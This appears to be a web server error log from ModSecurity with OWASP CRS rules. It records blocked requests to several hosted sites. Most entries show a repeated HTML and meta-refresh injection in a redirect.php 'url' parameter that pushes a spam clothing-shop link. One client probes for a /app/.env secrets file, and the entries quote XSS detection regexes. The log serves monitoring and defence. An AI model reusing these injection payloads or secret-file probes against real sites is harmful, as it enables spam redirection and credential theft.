[Tue May 12 02:02:16.149586 2026] [security2:error] [pid 1730207:tid 1730224] [client 27.78.84.116:64803] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"]  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuCDue9Sp-pIv_Bb6FbAAAAU8"]
[Tue May 12 02:02:16.149758 2026] [security2:error] [pid 1730207:tid 1730224] [client 27.78.84.116:64803] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "C [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuCDue9Sp-pIv_Bb6FbAAAAU8"]
[Tue May 12 02:02:16.150195 2026] [security2:error] [pid 1730207:tid 1730224] [client 27.78.84.116:64803] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuCDue9Sp-pIv_Bb6FbAAAAU8"]
[Tue May 12 02:02:16.150483 2026] [security2:error] [pid 1730207:tid 1730224] [client 27.78.84.116:64803] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuCDue9Sp-pIv_Bb6FbAAAAU8"]
[Tue May 12 02:02:16.171654 2026] [security2:error] [pid 1695975:tid 1695980] [client 176.65.139.237:57388] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm2.rentparadise.fr"] [uri "/app/.env"] [unique_id "agJuCNVI9ymHBxup74-DeQAAAII"]
[Tue May 12 02:02:16.171866 2026] [security2:error] [pid 1695975:tid 1695980] [client 176.65.139.237:57388] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm2.rentparadise.fr"] [uri "/app/.env"] [unique_id "agJuCNVI9ymHBxup74-DeQAAAII"]
[Tue May 12 02:02:16.177183 2026] [core:error] [pid 1695975:tid 1695980] [client 176.65.139.237:57388] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:02:16.179515 2026] [security2:error] [pid 1695975:tid 1695980] [client 176.65.139.237:57388] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm2.rentparadise.fr"] [uri "/index.php"] [unique_id "agJuCNVI9ymHBxup74-DeQAAAII"]
[Tue May 12 02:02:22.366270 2026] [security2:error] [pid 1730207:tid 1730223] [client 27.78.84.116:65369] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ttps%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuDjue9Sp-pIv_Bb6FbgAAAU4"]
[Tue May 12 02:02:22.366971 2026] [security2:error] [pid 1730207:tid 1730223] [client 27.78.84.116:65369] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https:/..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuDjue9Sp-pIv_Bb6FbgAAAU4"]
[Tue May 12 02:02:22.367155 2026] [security2:error] [pid 1730207:tid 1730223] [client 27.78.84.116:65369] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuDjue9Sp-pIv_Bb6FbgAAAU4"]
[Tue May 12 02:02:22.367263 2026] [security2:error] [pid 1730207:tid 1730223] [client 27.78.84.116:65369] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"]  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuDjue9Sp-pIv_Bb6FbgAAAU4"]
[Tue May 12 02:02:22.367479 2026] [security2:error] [pid 1730207:tid 1730223] [client 27.78.84.116:65369] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "C [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuDjue9Sp-pIv_Bb6FbgAAAU4"]
[Tue May 12 02:02:22.367925 2026] [security2:error] [pid 1730207:tid 1730223] [client 27.78.84.116:65369] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuDjue9Sp-pIv_Bb6FbgAAAU4"]
[Tue May 12 02:02:22.368211 2026] [security2:error] [pid 1730207:tid 1730223] [client 27.78.84.116:65369] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuDjue9Sp-pIv_Bb6FbgAAAU4"]
[Tue May 12 02:02:28.017080 2026] [autoindex:error] [pid 1730175:tid 1730200] [client 20.151.0.198:35740] AH01276: Cannot serve directory /home/letamsga/public_html/.well-known/acme-challenge/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 02:02:28.076922 2026] [security2:error] [pid 1730175:tid 1730180] [client 27.78.84.116:49480] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ttps%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuFHo6NvB9WXx5V-5xCgAAAQM"]
[Tue May 12 02:02:28.077689 2026] [security2:error] [pid 1730175:tid 1730180] [client 27.78.84.116:49480] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https:/..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuFHo6NvB9WXx5V-5xCgAAAQM"]
[Tue May 12 02:02:28.077865 2026] [security2:error] [pid 1730175:tid 1730180] [client 27.78.84.116:49480] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuFHo6NvB9WXx5V-5xCgAAAQM"]
[Tue May 12 02:02:28.077969 2026] [security2:error] [pid 1730175:tid 1730180] [client 27.78.84.116:49480] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"]  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuFHo6NvB9WXx5V-5xCgAAAQM"]
[Tue May 12 02:02:28.078144 2026] [security2:error] [pid 1730175:tid 1730180] [client 27.78.84.116:49480] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ttps%3a%2f%Evolv.e.L.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Luxurious middle-aged evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "C [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuFHo6NvB9WXx5V-5xCgAAAQM"]
[Tue May 12 02:02:28.078588 2026] [security2:error] [pid 1730175:tid 1730180] [client 27.78.84.116:49480] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuFHo6NvB9WXx5V-5xCgAAAQM"]
[Tue May 12 02:02:28.078885 2026] [security2:error] [pid 1730175:tid 1730180] [client 27.78.84.116:49480] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJuFHo6NvB9WXx5V-5xCgAAAQM"]
[Tue May 12 02:02:34.914529 2026] [security2:error] [pid 1730207:tid 1730213] [client 129.226.83.4:40502] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.domaine-de-janasse.com"] [uri "/"] [unique_id "agJuGjue9Sp-pIv_Bb6FdQAAAUQ"]
[Tue May 12 02:02:47.525026 2026] [autoindex:error] [pid 1691274:tid 1691292] [client 20.151.0.198:35809] AH01276: Cannot serve directory /home/letamsga/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 02:02:57.270777 2026] [autoindex:error] [pid 1691274:tid 1691277] [client 20.151.0.198:35717] AH01276: Cannot serve directory /home/letamsga/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 02:03:07.264033 2026] [autoindex:error] [pid 1691274:tid 1691277] [client 20.151.0.198:35717] AH01276: Cannot serve directory /home/letamsga/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 02:03:34.919460 2026] [autoindex:error] [pid 1730207:tid 1730228] [client 95.111.239.37:62981] AH01276: Cannot serve directory /home/letamsga/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 12 02:03:36.650977 2026] [security2:error] [pid 1691274:tid 1691291] [client 49.51.204.74:52360] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/"] [unique_id "agJuWFfdQaraX_prmqcVYQAAAA8"]
[Tue May 12 02:03:36.757684 2026] [core:error] [pid 1691274:tid 1691286] (70007)The timeout specified has expired: [client 91.137.27.140:38830] AH00574: ap_content_length_filter: apr_bucket_read() failed
[Tue May 12 02:03:39.288369 2026] [autoindex:error] [pid 1730207:tid 1730229] [client 95.111.239.37:65069] AH01276: Cannot serve directory /home/letamsga/public_html/.well-known/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: binance.com
